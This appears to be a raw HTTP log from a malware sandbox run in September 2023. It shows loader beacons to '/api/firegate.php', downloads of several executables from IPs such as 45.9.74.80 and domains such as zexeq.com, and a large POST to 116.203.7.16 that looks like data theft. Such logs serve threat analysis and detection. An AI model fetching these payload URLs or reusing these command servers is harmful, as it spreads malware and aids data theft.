POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 3357 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:57:13 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:57:14 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:57:27 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 768 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /super.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Sep 2023 07:57:28 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive

HEAD /ummaa.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Sep 2023 07:57:28 GMT Content-Type: application/octet-stream Content-Length: 202752 Last-Modified: Sat, 09 Sep 2023 20:16:40 GMT Connection: keep-alive ETag: "64fcd2a8-31800" Accept-Ranges: bytes

GET /super.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Cache-Control: no-cache

HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Sep 2023 07:57:28 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive

GET /ummaa.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Sep 2023 07:57:29 GMT Content-Type: application/octet-stream Content-Length: 202752 Last-Modified: Sat, 09 Sep 2023 20:16:40 GMT Connection: keep-alive ETag: "64fcd2a8-31800" Accept-Ranges: bytes

HEAD /f/fikim0907223.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 230907161118223.nmr.xrm42.top Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Caddy Status: 404 Not Found X-Powered-By: PHP/7.3.25 Date: Wed, 13 Sep 2023 07:57:30 GMT

GET /f/fikim0907223.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 230907161118223.nmr.xrm42.top Cache-Control: no-cache

HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Caddy Status: 404 Not Found X-Powered-By: PHP/7.3.25 Date: Wed, 13 Sep 2023 07:57:31 GMT Content-Length: 17

GET /test2/get.php?pid=CD20CF071BA7C05D5F5E6CAF42496E78&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:57:33 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 557 Connection: close Content-Type: text/html; charset=UTF-8

GET /dl/build2.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: colisumy.com

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:57:34 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40 Last-Modified: Mon, 11 Sep 2023 13:10:01 GMT ETag: "6aa00-605150b443e11" Accept-Ranges: bytes Content-Length: 436736 Connection: close Content-Type: application/octet-stream

GET /files/1/build3.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:57:34 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT ETag: "2600-5c86757379380" Accept-Ranges: bytes Content-Length: 9728 Connection: close Content-Type: application/x-msdownload

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 285 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:57:36 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /0bjdn2Z/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 45.9.74.80 Content-Length: 90 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Sep 2023 07:57:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /opaa37.exe HTTP/1.1 Host: 45.9.74.80

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Sep 2023 07:57:37 GMT Content-Type: application/octet-stream Content-Length: 406528 Last-Modified: Tue, 12 Sep 2023 14:11:07 GMT Connection: keep-alive ETag: "6500717b-63400" Accept-Ranges: bytes

GET /7b01483643983171e949f923c5bc80e7 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/103.0.0.0 Host: 116.203.7.16

HTTP/1.1 200 OK Server: nginx Date: Wed, 13 Sep 2023 07:57:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /htdocs.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/103.0.0.0 Host: 116.203.7.16 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx Date: Wed, 13 Sep 2023 07:57:38 GMT Content-Type: application/zip Content-Length: 2685679 Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT Connection: keep-alive ETag: "631f30d3-28faef" Accept-Ranges: bytes

POST /0bjdn2Z/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 45.9.74.80 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Sep 2023 07:57:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /toolspub2.exe HTTP/1.1 Host: 45.9.74.80

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Sep 2023 07:57:40 GMT Content-Type: application/octet-stream Content-Length: 195072 Last-Modified: Tue, 12 Sep 2023 14:11:19 GMT Connection: keep-alive ETag: "65007187-2fa00" Accept-Ranges: bytes

GET /fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=LHNMv561Ao9oyPaxqTAOF0Ae.exe&platform=0009&osver=5&isServer=0 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: go.microsoft.com Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily Content-Length: 0 Server: Kestrel Location: https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=LHNMv561Ao9oyPaxqTAOF0Ae.exe&platform=0009&osver=5&isServer=0 Request-Context: appId=cid-v1:26ef1154-5995-4d24-ad78-ef0b04f11587 X-Response-Cache-Status: True Expires: Wed, 13 Sep 2023 07:57:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 13 Sep 2023 07:57:40 GMT Connection: keep-alive

POST /0bjdn2Z/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 45.9.74.80 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Sep 2023 07:57:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /31839b57a4f11171d6abc8bbc4451ee4.exe HTTP/1.1 Host: 45.9.74.80

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Sep 2023 07:57:41 GMT Content-Type: application/octet-stream Content-Length: 4482440 Last-Modified: Tue, 12 Sep 2023 14:11:29 GMT Connection: keep-alive ETag: "65007191-446588" Accept-Ranges: bytes

POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----3461686729147006 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/103.0.0.0 Host: 116.203.7.16 Content-Length: 457773 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx Date: Wed, 13 Sep 2023 07:58:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

POST /0bjdn2Z/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 45.9.74.80 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Sep 2023 07:57:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Mon, 21 Aug 2023 22:08:28 GMT ETag: "37d-603761e33cf00" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Wed, 13 Sep 2023 08:57:49 GMT Date: Wed, 13 Sep 2023 07:57:49 GMT Connection: keep-alive